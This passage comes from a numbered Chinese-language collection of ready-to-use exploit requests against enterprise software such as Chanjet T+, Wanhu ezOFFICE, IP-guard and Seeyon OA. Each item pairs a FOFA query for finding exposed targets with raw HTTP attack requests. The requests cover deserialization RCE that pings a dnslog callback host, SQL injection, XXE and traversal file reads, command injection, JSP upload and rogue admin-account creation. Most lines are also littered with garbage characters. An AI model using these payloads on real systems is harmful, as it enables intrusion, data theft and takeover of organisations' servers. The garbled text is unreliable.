POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
4 [& [2 H& q7 i/ \ z' eHost: x.x.x.x
* E2 d! J- C7 A6 O1 w0 S: ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" K$ s/ o( a8 }1 l/ y; \8 Z. k
Content-Type: application/json: e3 ~( D; ^8 j/ ?. T
$ D# j' E9 F% r% v+ G; w' t{( Z5 `- p$ j7 \* o5 R4 L0 i0 L
"storeID":{ @& V* O# \! z R u% P0 J7 b+ K
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"," Z+ i; ]* S1 o, W1 H) F" s
"MethodName":"Start",
1 O7 k/ Z7 a7 K "ObjectInstance":{( o8 V7 q$ d | _ ?3 ^
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- [* W8 P0 `- P8 C* Z9 u "StartInfo": {$ L- l$ `0 P9 S: g
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",- A; `& _" K. M+ U- Q
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
, E& u N9 Y1 [' d. X H }' Q9 V1 G) ^2 j
}" g7 o! x7 `6 W X
}) Z+ t5 ]# A; D: ^& f: w5 I
}
& m8 ]9 e" P) ?& p. u- w. d/ W' U! O: A& F7 t/ b, [
6 }% }( }" f2 q( F, r. s7 Q57. 畅捷通T+ keyEdit.aspx SQL注入
9 O* M c4 J1 }# W7 DFOFA:app="畅捷通-TPlus"$ }% I+ u6 M. F) {' A
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
1 C* o/ m J- x D5 R2 ?; j( w6 wHost: host& B& _9 E s' q- \) |+ N8 g7 R, u
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! K: B; ?+ {* t* P4 {Accept-Charset: utf-8
4 Y8 E( {7 _# A3 IAccept-Encoding: gzip, deflate
$ ]: d7 K3 {/ ^% H3 u \Connection: close, v, B! t! T+ n8 Z
9 Q; C# @! S5 a. H0 H2 e" m
/ j, I% T; X! l: o- a58. 畅捷通T+ KeyInfoList.aspx sql注入* H1 N8 n& ~ `1 t
FOFA:app="畅捷通-TPlus"! p; k& A! t* O- z; E/ ^) R
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.12 B4 E# h M: H: c
Host: your-ip
; p# \4 Y- k4 _2 xUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! r0 q- _! ^& a8 m" `4 ?8 {Accept-Charset: utf-8
8 ?6 W9 x, w- HAccept-Encoding: gzip, deflate- Z" |0 O. A9 o% i, u
Connection: close5 b/ x. Z8 g+ E! D
# B' a5 @4 P1 ]) z- h
5 a: y8 f {' X! ]59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" q6 \( S1 i2 `" h+ j' Y5 p7 V( zFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"6 V5 o( |" [2 ~2 x3 ~
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+ |% G0 D! n' r8 a o: \: p% e2 \8 GHost: 192.168.86.128:9090
7 n4 M: o6 q% g/ \, y. I) jUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; b2 J2 G' i& e" \, \
Connection: close
0 ~- B7 l& ^8 p- F7 OContent-Length: 1669
* g* _3 S7 ~+ x# {+ v9 Y+ \Accept: */*3 J! a6 X2 h2 O$ w Y3 W
Accept-Language: en0 G2 Q6 p! ~5 E. \3 @& D+ z1 ^
Content-Type: application/x-www-form-urlencoded
$ Y. L' Z7 o9 |2 q3 E6 P! _Accept-Encoding: gzip' ~; v: l7 K n7 M; ?$ O6 I6 s. S
: U( M& x2 t8 H3 V" OPAYLOAD
! i X5 O- D) {* t8 T2 r. g' K
/ J3 f( e/ @- g$ U" q5 v% y$ s3 ^$ X& d3 v( h
60. 百卓Smart管理平台 importexport.php SQL注入
4 i9 g2 p! d3 P: \' BFOFA:title="Smart管理平台"1 O4 k5 i! L' ?. T `: W
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
' W- n9 ]( O y0 e R' h8 r7 GHost:5 v( u) V* A6 s* }0 k' J6 P; \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 ]4 z8 `( u2 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 j2 [. O8 c2 {& k) w
Accept-Encoding: gzip, deflate& D& L4 A$ w2 Q0 L
Accept-Language: zh-CN,zh;q=0.96 |+ b1 S& c, [- @& D
Connection: close& Q0 f9 ]7 z# h. n
0 `7 B: B5 {* x! C/ ~% q+ r
. c! p3 S2 x2 w$ c. w* z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
3 i" `% T ~$ r+ \! RFOFA: title="欢迎使用浙大恩特客户资源管理系统"
4 d/ B* }* b4 r& [7 fPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
+ l+ P( f' G/ [; z4 ]3 P- o2 `Host: x.x.x.x& l7 h$ g. q9 i; k% ?8 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ T& o% V! n$ x. K4 `* aConnection: close1 E5 }! Z8 a2 e7 N
Content-Length: 27
# {0 H" Y( O% O! aAccept: */*
7 h [5 x, Z% u, w8 s, ?1 ~, Q4 KAccept-Encoding: gzip, deflate% V# Q) e. N2 R7 z9 n. r* e
Accept-Language: en, M% ~* L- {0 f- O( h
Content-Type: application/x-www-form-urlencoded
# x; q0 {$ v- z7 P3 ^5 T- s! M/ @7 Z o+ r
8uxssX66eqrqtKObcVa0kid98xa3 q4 m$ x6 y% Z/ M
9 F6 f% n$ }( @2 @9 [$ d0 c( x! u' f' O% f5 s+ _8 _
62. IP-guard WebServer 远程命令执行" n0 \" a7 Q) E! h9 _; H) W
FOFA:"IP-guard" && icon_hash="2030860561"! f3 c: ^) M7 A3 A" \
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& F6 G4 K4 K1 F" o! I- o
Host: x.x.x.x
9 O+ C& x6 M% d- c# eUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" l. G: O5 o& \" e* i% }9 X
Connection: close
" `1 Y7 E" e7 t1 E6 aAccept: */*# V6 Q: I) v# @4 h
Accept-Language: en# Q& a W4 Q- ?9 G; ^% O* f& v- Y+ D
Accept-Encoding: gzip) p" K5 k8 u+ O. _+ |+ r$ P- @
& W( A q3 I4 z9 K+ ~: I
! v B( @0 ^) J v3 e
访问
" h ~, Y4 R# Q+ r/ y [! p. f _
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
! Z" d% r+ S* x, C5 @. \% ~Host: x.x.x.x
, N: H# `0 D: e7 H6 X. A& U+ Z
+ L( X, [8 ?, o! g( {/ d( j/ `( o% \; ]8 V0 h# n
63. IP-guard WebServer任意文件读取
4 k n9 L$ v( L7 @" c3 kIP-guard < 4.82.0609.0
5 T0 K8 F' ~* ]' F/ L( [FOFA:icon_hash="2030860561"
3 m8 X% `( Z, b( t X. U6 gPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1# f$ Q! o* v& d$ m9 B! s
Host: your-ip
+ ?7 `7 m' I- C' N: S' ?( v- @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 G$ d5 n$ f# C& ?0 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( g# ~8 ]* A9 `+ S$ n- v6 P
Accept-Encoding: gzip, deflate0 q( y0 o% `% V; ]! x' K4 D: r2 p
Accept-Language: zh-CN,zh;q=0.9
7 [; s7 [. B8 I* hConnection: close
, u1 g, F" z- o7 K- }5 HContent-Type: application/x-www-form-urlencoded ]& K; R' ~; W& @/ N
: m0 b2 P2 r( S9 \; T* upath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A! i4 h2 j5 `& |: b
; U6 Q# ~$ ]( v$ ^0 A: q
64. 捷诚管理信息系统CWSFinanceCommon SQL注入8 U( k6 A! `& a
FOFA:body="/Scripts/EnjoyMsg.js"' p. s4 V# \8 Z: W$ @
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 Q q% V9 G6 W5 A" x
Host: 192.168.86.128:9001
" R- A2 b _' D& ]User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.363 c X7 J9 G% f; |
Connection: close* Q# M0 l) e1 n! ]: \
Content-Length: 369
6 }# X, E. ~2 l, Z5 x+ k0 e5 wAccept: */*: T0 w- J' n$ W" y* d4 v0 I- P
Accept-Language: en
) l; Q" w' T" ]6 F+ X& {Content-Type: text/xml; charset=utf-8
' y. |. L/ |8 p" | Y7 L# A6 ]Accept-Encoding: gzip" t5 h3 X) ?: I" k" H8 N3 ]
- H. b& I! l4 @ A9 t, f4 `0 p
<?xml version="1.0" encoding="utf-8"?>0 a& N5 y) p: K
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- Y1 K5 B4 Y( u# d% ~ ^<soap:Body>' r4 F! f" K0 d( M7 d6 `$ w; d
<GetOSpById xmlns="http://tempuri.org/">
; {* y# ]9 E- n( q' l% i <sId>1';waitfor delay '0:0:5'--+</sId>& d9 \2 P% W+ O2 ^" V2 C
</GetOSpById>
: `" m( A. x- I) u) _& _! i </soap:Body>) V% [/ C+ l7 x
</soap:Envelope>
6 V. a2 j( }: v5 f5 Y. b+ w
: h! t+ j4 H E( ^
* I7 N- c2 k" z% ~9 ^3 d65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过2 k* p, F {9 S. d
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台" Z& B, t4 m! y& G
响应200即成功创建账号test123456/123456$ `1 L: W* }$ e2 G( J* C* k
POST /SystemMng.ashx HTTP/1.1
- E- A: B& {4 t2 `Host:
+ a' k" n& T- ?2 o6 w7 xUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
, {+ y( W2 L6 L$ ^' o0 F* [7 kAccept-Encoding: gzip, deflate, u2 B9 A! C9 K+ _0 S1 w" K% l
Accept: */*
- p9 D; s* b- D3 @3 q RConnection: close
& l [: V1 X+ w1 J$ d8 O" i! y5 FAccept-Language: en) ]$ P; Y* z* O( n
Content-Length: 174* c4 [5 W8 x& s& I3 d
' t; T) v& i1 k1 F- \% `* W3 K/ R3 k/ h9 I
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators- ?, r! e: \ p* i; B5 }# ~9 |
9 q/ s. W1 l" g* N7 F/ S9 X5 c7 z" D& {3 p7 `& ]* N6 P
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入+ s+ [+ G6 I" l5 `) D, `5 F1 f, \' ~4 l
FOFA:app="万户ezOFFICE协同管理平台"
% |; W0 R; S% S! g- x9 h) u; Q# d
; R7 z( ?. |. _GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
6 W* F |* g; R) M! J$ f$ iHost: x.x.x.x
: V5 a% `$ ]8 n0 t! y+ I) Y0 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ N% _* E3 ^9 W& gConnection: close0 H& e5 ~2 T; f5 E* M: ~
Accept: */*: j }6 @! w- B9 P; v+ h
Accept-Language: en
* m. `) S/ M$ I7 `) \6 S3 RAccept-Encoding: gzip: X# x V6 h- b5 |0 ~3 R' x$ p: R
1 H4 z6 A8 D# `0 y
$ V( _ B, N5 D$ _* |% T3 ?( C第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在( p; @) W; F& ?% c+ _6 n6 L
* Y+ m+ S( _6 h, m
67. 万户ezOFFICE wpsservlet任意文件上传3 j: P4 T8 J, E- e. l) ^
FOFA:app="万户网络-ezOFFICE"" V) t; K6 E, D9 t" x" g" p
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
/ \9 i; F/ M* v' R! SPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
: d$ T3 \' q5 E' W9 p8 \% s! {- HHost: x.x.x.x [" C3 I( l- f& v: e
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0, J+ t* Q* j4 X3 w8 |
Content-Length: 173, M$ H* I& K7 m- \+ P% }" X6 a5 _+ [! R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% d/ b7 P/ A3 u, m' ]& U" sAccept-Encoding: gzip, deflate
- e, @, {' R2 I4 E! {5 s- CAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.32 T& e! h1 {( t+ c
Connection: close# D+ M7 F; O+ }
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
Q9 C$ f& W* Z* @2 d# NDNT: 19 F6 I) q( _: m- W( V7 l5 _
Upgrade-Insecure-Requests: 1
/ j, ]9 v& I: L
8 d& i+ A+ X; l6 I--ufuadpxathqvxfqnuyuqaozvseiueerp
" F. X2 A( T! e, c% a2 pContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"+ f6 d5 R. T% I# q
1 O) J% o0 {0 w# w \1 ~
<% out.print("sasdfghjkj");%>
6 o7 k4 h A; s: c1 `+ }8 ^! |--ufuadpxathqvxfqnuyuqaozvseiueerp--: x+ M4 ~8 D" q! Z! T
: d, s1 C; Q5 |# O3 ~. B
1 h+ K' F* p& s
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
# g; z" ^2 q m3 W0 f9 [
! r+ B5 u3 [1 G5 P68. 万户ezOFFICE wf_printnum.jsp SQL注入
9 X3 V% R9 E2 {5 s. U/ qFOFA:app="万户ezOFFICE协同管理平台", {; \& w" |) x- D) P4 R9 C
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
7 H2 ?& G+ @9 X1 b$ b pHost: {{host}}
2 ~& N& G5 T5 M- |9 \# hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
; ^3 S" {' Q1 J( zAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
2 [" ?0 r6 Q! C* D* ?8 a$ D7 w' mAccept-Encoding: gzip, deflate
" E* ~5 B) k+ h0 bAccept-Language: zh-CN,zh;q=0.9
9 r' l; O) G6 v/ o, sConnection: close. w/ p# [8 K6 J) M9 Q: y
0 u4 z+ @, @' a/ A3 f$ y" q: E, F% g+ n7 Y
69. 万户 ezOFFICE contract_gd.jsp SQL注入. P3 w% {: }$ A2 ]1 p1 a/ n6 _- G
FOFA:app="万户ezOFFICE协同管理平台"
0 \9 |0 K- w' w3 X3 yGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
* D- T; ^/ ]4 z1 Y) O' c! P7 vHost: your-ip! p9 W; R0 ]4 ?" B" c3 v" r) ~; l
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ h' d A; h1 i9 H- WAccept-Encoding: gzip, deflate5 [1 P% P/ j6 i5 X
Accept: */*( [ Z9 I& e" i8 C0 X
Connection: keep-alive
. z* L: E' ^% s! T; ?' A u2 a, Q/ z9 b3 u
. K8 h. d+ {1 `# N9 R70. 万户ezEIP success 命令执行
! J# B# F) @1 d' R2 i- [FOFA:app="万户网络-ezEIP". \4 j* b0 j: j) y
POST /member/success.aspx HTTP/1.1" Q3 _5 h. {5 e9 N9 `5 n0 t B
Host: {{Hostname}}4 N6 E% q0 J/ H6 s" J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
, G) O0 U6 u( @4 P* m$ @5 e: rSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=6 m. K6 e$ x4 y9 O; U- a; R
Content-Type: application/x-www-form-urlencoded
) B7 j" A l) {% WTYPE: C/ W) f5 K g$ r
Content-Length: 16702: F, W% w# X( P
# t7 k6 s% [! e% b8 M$ R7 |
__VIEWSTATE=PAYLOAD
1 ^7 l/ N: @" e. n( I; e, m
' m" A: I. b- Z
; @) y) F1 a, z71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入! u( v- }5 u& D2 y" U9 @' S" d( P r
FOFA:body="PM2项目管理系统BS版增强工具.zip"7 _: f1 I! W' g! \; Q4 b1 ^* E
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1% G5 y) b1 i1 J- D
Host: x.x.x.xx.x.x.x
/ \, V7 M. R3 x2 Q7 L% h5 zUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ _$ t j" h: ~5 ~
Connection: close
- C3 U8 j5 _" UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 {+ P/ _- G- @ K9 n* B
Accept-Encoding: gzip, deflate. L) j, K# P7 q1 F9 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 ~2 v7 g' A" K1 ]* _+ H/ K, M* `
Upgrade-Insecure-Requests: 18 M, D% I, ^6 t: M Y4 f0 ~3 I
: z' q! C+ f1 |. B
9 i" P4 B' y( b( B& S72. 致远OA getAjaxDataServlet XXE
5 Z7 U; t; \7 @8 [7 m6 L( d% gFOFA:app="致远互联-OA"
. I, p/ ^+ u/ [' ]+ O; [8 K. mPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1* w2 H$ \, N8 i7 \" `
Host: 192.168.40.131:8099
4 _* s# z6 w7 S4 @" T5 Y# hUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
/ q/ S; [+ t. _: U2 K9 {' u- hConnection: close4 C& B8 {$ z" H6 s1 V# n
Content-Length: 583
( j) z& U5 P# JContent-Type: application/x-www-form-urlencoded
5 D$ B. U" y6 m& [6 QAccept-Encoding: gzip
2 @. F9 R8 x% F: g" v, j2 [3 u' W
& `8 E' m/ j4 i5 |3 q3 I: G" MS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
D% U/ o$ _: H7 Y9 ]
. @( {4 A) F: D) \2 h" [' w3 Z8 k& Z2 [: M' L4 U7 H$ C5 |$ _$ W- L
73. GeoServer wms远程代码执行, |. X; r& a$ M% R# m. U: i% m- D
FOFA:icon_hash=”97540678”2 q& b- s$ _' E& ^) [
POST /geoserver/wms HTTP/1.1
* w% _. ?# j, K! T% _Host:" T2 L7 t1 u4 r7 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) S8 |7 u2 U5 {6 K x4 [* W6 FContent-Length: 1981
' @* b( w4 _9 y) `' @2 b3 XAccept-Encoding: gzip, deflate
. s* g9 w6 k% e' h8 oConnection: close. Q* V& K7 L Z8 K) P- g5 |
Content-Type: application/xml' {2 @" X5 f8 c4 ?4 e
SL-CE-SUID: 3% _0 z% H6 S/ I& k
+ X/ {8 f5 b, ZPAYLOAD% v. ^' n) q9 j! _, r( b8 x+ ?
; \* h7 B" F+ i3 e, ] S
6 w. D P# `- W3 q74. 致远M3-server 6_1sp1 反序列化RCE3 j8 `& i, Q$ S$ e8 x
FOFA:title="M3-Server" h$ w# L3 w& ?# d# a
PAYLOAD8 Z/ G: n5 J& T: Z& j K' Y7 B
/ B$ M# o9 \' E1 V75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE" J* u7 x' ~. H
FOFA:app="TELESQUARE-TLR-2005KSH") B: D3 `' j; a: _
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
' C. N9 e, U0 ]1 R' E, LHost: x.x.x.x0 v* W2 N( z! w- V! h& |) O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# J7 k$ b8 y# {0 x# |7 S
Connection: close3 T! ]2 n) s- m8 M% h4 k6 o
Accept: */*
) t* \9 _6 V4 t1 L7 e6 nAccept-Language: en6 p1 |! T& \1 Y& {$ g
Accept-Encoding: gzip
+ X. }1 e2 |& h; R: w1 K2 ]& M7 _! A0 M# q( i
( G, F1 z& g. x. _4 W9 n! u$ BGET /cgi-bin/test28256.txt HTTP/1.1
5 E! Z/ M% e [Host: x.x.x.x
% I0 ?0 o! }; p: U; d( C
" R- _/ A/ \: R8 N. ~0 J |
, I' X& I! h* @4 p5 V/ n76. 新开普掌上校园服务管理平台service.action远程命令执行4 s+ p. K9 W7 Y2 z3 ^/ J. j
FOFA:title="掌上校园服务管理平台"
) b( R+ n9 N* @1 s" y+ _" PPOST /service_transport/service.action HTTP/1.1( K- h, @) w7 v/ g9 D# E! P
Host: x.x.x.x
9 C! m" }+ _7 u! T: hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.08 v! I0 _& v r* u2 c$ r5 @
Connection: close0 f9 M( e. { e+ b2 H6 K9 N* s* \" c# H
Content-Length: 2111 N, n+ q6 E j/ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 S. Y7 x% Y( C
Accept-Encoding: gzip, deflate, {$ E0 S4 r4 O( A" w ]- M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! `2 C6 \; S9 X0 N
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A47 y/ B9 n# U% c6 s4 m
Upgrade-Insecure-Requests: 1
" l# y5 b/ Y3 r, l7 t' v3 o
; Q" ?' E8 n& s1 ^+ P" @{
6 x' }5 ^# `, b$ C"command": "GetFZinfo",% J9 w h8 e6 G9 O: R
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
- x1 V) `& U0 ^# O9 V. `- G6 t ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
4 r6 n8 {5 E# ?9 T' X* W. @}
* {+ h2 \7 b4 Y3 t* j0 d# y% W% P1 {+ X+ z# n1 H
% W- A9 @ J8 k: W; y% M3 K1 fGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
b8 }7 W: w" K; f U. z: WHost: x.x.x.x8 g& v: y1 m# O# D
0 p o4 a7 \) ]0 t
0 P. z. ~" ]; }% D) \
' S2 G0 F( {$ _( \$ a* E77. F22服装管理软件系统UploadHandler.ashx任意文件上传1 C& f# L! Y& u! N H: ~. y
FOFA:body="F22WEB登陆"
" a2 k f3 U4 F* BPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
$ P; W" c: C4 A7 D; x. aHost: x.x.x.x
# O5 J! y Y9 U$ H8 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% g2 X, \7 ]7 p
Connection: close
7 q# ~- z) a- c' M- KContent-Length: 433: q- I) f. E# p0 [: O4 q
Accept: */*, F# v8 l! I L, b5 m2 ?
Accept-Encoding: gzip, deflate
( P+ X1 y& U4 Y5 g9 J& P8 C: h' E0 fAccept-Language: zh-CN,zh;q=0.9: j# O$ }( Z6 t) P
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix+ s+ r& o. c+ F0 ~$ x
9 u# q2 U8 s" \------------398jnjVTTlDVXHlE7yYnfwBoix0 d1 k- T# X0 I* l( b) `- I+ z
Content-Disposition: form-data; name="folder"
0 k# _$ |7 I5 }5 o
. v: O. C$ _( q9 L/upload/udplog9 Q$ N( u9 x8 s: q
------------398jnjVTTlDVXHlE7yYnfwBoix* s1 Q7 }: ~6 J9 z
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
5 L, T, M8 v1 |. @Content-Type: application/octet-stream
* n3 \+ \ [+ ?% G o2 c3 N$ o1 ? e6 D$ A; ~/ }" H9 H1 f
hello1234567& ]9 d; D3 d% e; x8 y/ g+ ^6 h
------------398jnjVTTlDVXHlE7yYnfwBoix4 x) D7 h: Q' N4 @
Content-Disposition: form-data; name="Upload"0 o% T0 L& k! V6 F
4 w& C0 f+ C2 W; X& @Submit Query
e. x- O3 e# V x) l5 I' @------------398jnjVTTlDVXHlE7yYnfwBoix--$ y* ~8 S8 l$ g8 ?/ ?' }5 Y
+ y4 i3 ~9 q9 }4 \' ~% f1 A; J
; P% C4 z9 _" f" H78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传+ `! U( l# _0 ]7 Y+ y; r. \
FOFA:icon_hash="2001627082"
- d) B1 w' E, T, b" b1 w( t0 UPOST /Platform/System/FileUpload.ashx HTTP/1.1
- w2 f* i6 F* v% QHost: x.x.x.x
a3 J/ m% p E, ?2 y4 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ l; P! F% W g2 S+ J; m5 m: k: x4 h
Connection: close
( j! T* Q5 w. R9 P$ r6 XContent-Length: 336
+ j+ |9 V/ V& _: \7 L- ]4 oAccept-Encoding: gzip+ D7 Q; h% l t9 V# f3 q* Z
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l4 [5 h: I; N% I. e" R
6 D5 Y% Y; c: s
------YsOxWxSvj1KyZow1PTsh98fdu6l
7 h* D/ A" E6 ^0 s$ i8 A7 eContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
; Z# \: C" f( B0 M( FContent-Type: image/png
% h' q/ p+ x- n; e, o; E: F0 j* |2 t, |3 [
